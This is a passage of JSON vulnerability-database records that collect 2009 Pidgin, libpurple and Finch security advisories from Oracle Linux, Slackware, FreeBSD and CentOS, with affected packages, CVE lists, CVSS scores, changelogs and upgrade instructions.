"2.5.5-2.el4", "arch": "i386", "packageFilename": "finch-devel-2.5.5-2.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-2.5.5-2.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "finch-2.5.5-2.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "src", "packageFilename": "pidgin-2.5.5-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "src", "packageFilename": "pidgin-2.5.5-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "src", "packageFilename": "pidgin-2.5.5-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-2.5.5-2.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "finch-2.5.5-2.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.5.5-2.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.5.5-2.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}], "description": "[2.5.5-2]\n- Security/DoS fixes from 2.5.6\n CVE-2009-1373-8331e31a\n CVE-2009-1374-ad057b75\n 2c9a1153\n CVE-2009-1375-7829ec76\n CVE-2009-1376-9dd1c4c3 ", "edition": 3, "reporter": "Oracle", "published": "2009-05-26T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-26T00:00:00", "id": "ELSA-2009-1060", "href": "http://linux.oracle.com/errata/ELSA-2009-1060.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:43:19", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "finch-2.6.2-2.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.6.2-2.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "finch-devel-2.6.2-2.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.2-2.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "finch-2.6.2-2.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.2-2.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "pidgin-2.6.2-2.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.2-2.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "libpurple-2.6.2-2.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.2-2.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.6.2-2.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.2-2.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.2-2.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.2-2.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "finch-devel-2.6.2-2.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.2-2.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.6.2-2.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "src", "packageFilename": "pidgin-2.6.2-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "src", "packageFilename": "pidgin-2.6.2-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "src", "packageFilename": "pidgin-2.6.2-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.2-2.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.6.2-2.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "libpurple-2.6.2-2.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.6.2-2.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "pidgin-2.6.2-2.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "finch-2.6.2-2.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "pidgin-2.6.2-2.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.2-2.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.2-2.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.2-2.el4", "arch": "x86_64", "packageFilename": "libpurple-2.6.2-2.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}], "description": "[2.6.2-2]\n- Upstream backports:\n 97e003ed2bc2bafbb993693c9ae9c6d667731cc1 aim-buddy-status-grab\n 37aa00d044431100d37466517568640cb082680c yahoo-buddy-idle-time\n 40005b889ee276fbcd0a4e886a68d8a8cce45698 yahoo-status-change-away\n cb46b045aa6e927a3814d9053c2b1c0f08d6fa62 crash-validate-jid\n[2.6.2-1.1]\n- VV support needs to be explicitly disabled on F10\n[2.6.2-1]\n- 2.6.2 Fixes a number of crashes\n- CVE-2009-2703, CVE-2009-3083, CVE-2009-3084, CVE-2009-3085\n[2.6.1-1]\n- 2.6.1: Fix a crash when some users send you a link in a Yahoo IM\n[2.6.0-1]\n- CVE-2009-2694\n- Voice and Video support via farsight2 (Fedora 11+)\n- Numerous other bug fixes\n[2.6.0-0.11.20090812]\n- new snapshot at the request of maiku\n[2.6.0-0.10.20090806]\n- new snapshot - theoretically better sound quality in voice chat\n[2.6.0-0.9.20090804]\n- new snapshot\n[2.6.0-0.8.20090727]\n- new snapshot\n[2.6.0-0.6.20090721]\n- Prevent main libpurple & pidgin packages depending on perl (#513902)\n[2.6.0-0.5.20090721]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n[2.6.0-0.4.20090721]\n- rebuild\n[2.6.0-0.3.20090721]\n- prevent crash with no camera when closing vv window\n[2.6.0-0.1.20090721]\n- 2.6.0 snapshot with voice and video support via farsight2\n[2.5.8-2]\n- Backport patch from upstream to enable NSS to recognize root CA\n certificates that use MD2 & MD4 algorithms in their signature, as\n used by some MSN and XMPP servers ", "edition": 3, "reporter": "Oracle", "published": "2009-09-21T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3084", "CVE-2009-3085", "CVE-2009-3083", "CVE-2009-3026", "CVE-2009-2703", "CVE-2009-2694"], "modified": "2009-09-21T00:00:00", "id": "ELSA-2009-1453", "href": "http://linux.oracle.com/errata/ELSA-2009-1453.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:45", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.5.9", "arch": "i486", "packageFilename": "pidgin-2.5.9-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.5.9", "arch": "i486", "packageFilename": "pidgin-2.5.9-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.5.9", "arch": "i486", "packageFilename": "pidgin-2.5.9-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz:\n This update fixes a bug in Pidgin's MSN protocol implementation that can\n allow a remote attacker to send a malicious MSN message to a Pidgin user,\n which will possibly cause arbitrary code to be executed as that user.\n This issue was discovered by Federico Muttis of Core Security Technologies.\n For more information, see:\n http://www.coresecurity.com/content/libpurple-arbitrary-write\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.9-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n3ce9ef2fb489919027f5fd48aecfe16e pidgin-2.5.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nab5b36db9e7f97b845672d030b64b999 pidgin-2.5.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nbefadfc8dde193789bcee91f7f33f8ba pidgin-2.5.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\n4bc5945ad08e4fa5ebefcd1c5fc9c932 pidgin-2.5.9-i486-1.txz\n\nSlackware64 -current package:\n0a18668ccb5cd223e56789c871997769 pidgin-2.5.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.9-i486-1_slack12.2.tgz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2009-08-19T18:56:17", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-19T18:56:17", "id": "SSA-2009-231-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.423964", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T02:37:12", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.5.6", "arch": "i486", "packageFilename": "pidgin-2.5.6-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.5.6", "arch": "i486", "packageFilename": "pidgin-2.5.6-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.5.6", "arch": "i486", "packageFilename": "pidgin-2.5.6-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.6-i486-1_slack12.2.txz: Upgraded to pidgin-2.5.6.\n This version fixes security issues that could lead to a denial of service or\n the execution of arbitrary code as the user running Pidgin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.6-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n8890772717a70b042f5c76ae4e4ab6b0 pidgin-2.5.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n3d7e918ff1d3eef13107472f313978a4 pidgin-2.5.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n144a78d203391bd7af7aac36d53061f3 pidgin-2.5.6-i486-1_slack12.2.tgz\n\nSlackware -current package:\n0b2aa951d3f6b9f8d5a9ac7e8d28c7a6 pidgin-2.5.6-i486-1.txz\n\nSlackware64 -current package:\ne79c2f0466d4714951a7f53f04740695 pidgin-2.5.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.6-i486-1_slack12.2.tgz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2009-05-26T19:19:48", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-05-26T19:19:48", "id": "SSA-2009-146-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.435503", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:24", "references": ["http://secunia.com/advisories/36384/", "http://www.pidgin.im/news/security/?id=34"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpurple", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "finch", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "\nSecunia reports:\n\nA vulnerability has been reported in Pidgin, which can be\n\t exploited by malicious people to potentially compromise a user's\n\t system.\nThe vulnerability is caused due to an error in the\n\t \"msn_slplink_process_msg()\" function when processing MSN SLP\n\t messages and can be exploited to corrupt memory.\nSuccessful exploitation may allow execution of arbitrary\n\t code.\nThe vulnerability is reported in versions 2.5.8 and prior.\n\t Other versions may also be affected.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2009-08-18T00:00:00", "title": "pidgin -- MSN overflow parsing SLP messages", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-18T00:00:00", "id": "59E7AF2D-8DB7-11DE-883B-001E3300A30D", "href": "https://vuxml.freebsd.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:15:25", "references": ["http://www.pidgin.im/news/security/?id=30", "http://www.pidgin.im/news/security/?id=29", "http://www.pidgin.im/news/security/?id=32", "http://secunia.com/advisories/35194/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "finch", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpurple", "operator": "lt"}], "description": "\nSecunia reports:\n\nSome vulnerabilities and weaknesses have been reported in Pidgin,\n\t which can be exploited by malicious people to cause a DoS or to\n\t potentially compromise a user's system.\nA truncation error in the processing of MSN SLP messages can be\n\t exploited to cause a buffer overflow.\nA boundary error in the XMPP SOCKS5 \"bytestream\" server when\n\t initiating an outgoing file transfer can be exploited to cause a\n\t buffer overflow.\nA boundary error exists in the implementation of the\n\t \"PurpleCircBuffer\" structure. This can be exploited to corrupt memory\n\t and cause a crash via specially crafted XMPP or Sametime\n\t packets.\nA boundary error in the \"decrypt_out()\" function can be exploited\n\t to cause a stack-based buffer overflow with 8 bytes and crash the\n\t application via a specially crafted QQ packet.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2009-06-03T00:00:00", "title": "pidgin -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "id": "B1CA65E6-5AAF-11DE-BC9B-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/b1ca65e6-5aaf-11de-bc9b-0030843d3802.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:59", "references": ["http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2009-1218.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "finch-devel", "packageFilename": "finch-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-4.el3.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.5.9-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.5.9-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-4.el3.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.5.9-1.el5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": 